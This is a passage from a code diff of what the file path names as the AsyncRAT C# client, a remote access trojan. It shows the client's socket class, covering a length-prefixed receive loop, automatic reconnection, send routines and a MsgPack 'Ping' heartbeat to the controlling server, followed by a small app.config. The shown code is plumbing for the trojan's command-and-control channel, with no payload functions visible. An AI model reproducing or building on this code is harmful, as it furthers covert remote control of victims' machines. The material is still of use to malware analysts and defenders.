StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 12).ToUpper();
}
/// get the length of the buffer by reading byte by byte [1]
/// until we get the full size.
public static void ReadServertData(IAsyncResult ar)
{
try
{
if (Client.Connected == false)
{
Reconnect();
return;
}
int Recevied = Client.EndReceive(ar);
if (Recevied > 0)
{
if (BufferRecevied == false)
{
if (Buffer[0] == 0)
{
Buffersize = Convert.ToInt64(Encoding.UTF8.GetString(MS.ToArray()));
Debug.WriteLine("/// Buffersize: " + Buffersize.ToString() + "Bytes ///");
MS.Dispose();
MS = new MemoryStream();
if (Buffersize > 0)
{
Buffer = new byte[Buffersize - 1];
BufferRecevied = true;
}
}
else
{
MS.Write(Buffer, 0, Buffer.Length);
}
}
else
{
MS.Write(Buffer, 0, Recevied);
if (MS.Length == Buffersize)
{
ThreadPool.QueueUserWorkItem(HandlePacket.Read, MS.ToArray());
MS.Dispose();
MS = new MemoryStream();
Buffer = new byte[1];
Buffersize = 0;
BufferRecevied = false;
}
else
{
Buffer = new byte[Buffersize - MS.Length];
}
}
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
}
else
{
Reconnect();
}
}
catch
{
Reconnect();
}
}
/// Send
/// adding the buffersize in the beginning of the stream
public static void BeginSend(byte[] buffer)
{
lock (SendSync)
{
if (Client.Connected)
{
try
{
using (MemoryStream MS = new MemoryStream())
{
byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + Strings.ChrW(0));
MS.Write(buffersize, 0, buffersize.Length);
MS.Write(buffer, 0, buffer.Length);
Client.Poll(-1, SelectMode.SelectWrite);
Client.BeginSend(MS.ToArray(), 0, (int)(MS.Length), SocketFlags.None, EndSend, null);
}
}
catch
{
Reconnect();
}
}
}
}
public static void EndSend(IAsyncResult ar)
{
try
{
Client.EndSend(ar);
}
catch
{
Reconnect();
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = DateTime.Now.ToLongTimeString().ToString();
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
}
}

3
AsyncRAT-C#/Client/app.config Normal file
View File

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>